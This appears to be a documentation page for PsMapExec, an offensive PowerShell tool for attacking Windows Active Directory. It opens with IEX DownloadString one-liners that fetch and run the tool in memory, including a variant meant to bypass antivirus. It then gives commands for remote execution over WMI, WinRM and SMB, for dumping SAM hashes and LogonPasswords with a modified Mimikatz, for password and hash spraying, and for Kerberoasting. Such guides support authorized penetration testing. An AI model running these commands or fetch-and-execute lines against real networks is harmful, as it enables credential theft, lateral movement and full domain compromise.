Pentest Everything
Ask or search…


# Load directly into memory without attempting to bypass AV
IEX(New-Object System.Net.WebClient).DownloadString("")
# Load directly into memory and attempt to bypass AV
IEX(New-Object System.Net.WebClient).DownloadString("");IEX(New-Object System.Net.WebClient).DownloadString(""

Usage Examples

# Execute WMI commands over all systems in the domain using password authentication
PsMapExec -Targets all -Method WMI -Username Admin -Password Pass -Command ""net user""
# Execute WinRM commands over all systems in the domain using hash authentication
PsMapExec -Targets all -Method WinRM -Username Admin -Hash [Hash] -Command ""net user""
# Check RDP Access against workstations in the domain and using local authentication
PsMapExec -Targets Workstations -Method RDP -Username LocalAdmin -Password Pass -LocalAuth
# Dump SAM on a single system using SMB and a -ticket for authentication
PsMapExec -Targets DC01.Security.local -Method SMB -Ticket [Base64-Ticket] -Module SAM
# Check SMB Signing on all domain systems
PsMapExec -Targets All -Method GenRelayList
# Dump LogonPasswords on all Domain Controllers over WinRM
PsMapExec -Targets DCs -Method WinRM -Username Admin -Password Pass -Module LogonPasswords
# Use WMI to check current user admin access from systems read from a text file
PsMapExec -Targets C:\temp\Systems.txt -Method WMI
# Spray passwords across all accounts in the domain
PsMapExec -Method Spray -SprayPassword [Password]
# Spray Hashes across all accounts in the domain
PsMapExec -Method Spray -SprayHash [Hash]
# Spray Hashes across all Domain Admin group users
PsMapExec -Targets ""Domain Admins"" -Method Spray -SprayHash [Hash]
# Kerberoast
PsMapExec -Method Kerberoast -ShowOutput
PsMapExec -Targets IPMI

Usage Parameters

General Parameters

Runs the specified command on the remote system
Instructs PsMapExec to run in current user context. This is default when no other credentials are specified
Specifies what domain to run against. Otherwise the current user domain is used
Specifies what Domain controller to authenticate against
Used to force PsMapExec to run when domain or enterprise admin credentials are used
Flushes stored LDAP variables. Mostly only needed if working in a long term shell in a large enivronment where new computers and users may be added to the domain over time.
Pull scripts from specified local file server address
Specifies the module to be used for command execution
Surpresses the script banner
Surpresses parsing of some module outputs
Queries an online rainbow table from dumped hashes with the modules "Sam, LogonPasswords and NTDS".
Shows only successful results
Sets the port scan timeout (ms) against the specified method.
Sets the concurrent executions jobs to run (Default:30)

Authentication Parameters

[RC4] or [AES256]
Hash value. Must be supplied with -Username
Used to specify when local account authentication should be used
Password value. Must be suplied with -Username
[Ticket] or [Path to ticket]
B64 encoded Kerberos ticket to use for authentication. -Username is not required

Command execution Parameters

Runs the specified command on the remote system
Specifies the module to be used for command execution
Displays output for executed modules. Commands will still be shown

Spraying Parameters

Sprays SAM Account name values as passwords
Sprays "blank" passwords
[RC4] or [AES256]
Hash value to be used for hash spraying
Password value to be used for hash spraying

Most of these have additional documentation that delves into more detail about each (Available on the left-hand sidebar of this page).
Generally, you can mix and match various parameters across different methods and modules.


PsMapExec has some dependencies that need to be pulled from outside the script itself in order to function.
Primarily these are:
  • Kirby (PowerShell based Kerberos ticket dump)
  • Invoke-Pandemonium (Slightly modified Mimikatz)
There are plans to ensure long term that PsMapExec requires no external dependencies, however this requires the script to be massively reduced and AV bypasses to be considered.
Currently, they are pulled from a seperate GitHub repository:
If you are working within an environment that has no external access or GitHub is blocked by a firewall you will need to clone the scripts in the respository onto the system from which PsMapExec is running from. PsMapExec does not currently host a HTTP server for these so you will need to use something like HFS:
PsMapExec supports pointing to a locally or alternatively hosted server for the script dependencies.
PsMapExec -Targets All -Username [User] -Password [Pass] -LocalFileServer [IP]
Last modified 3m ago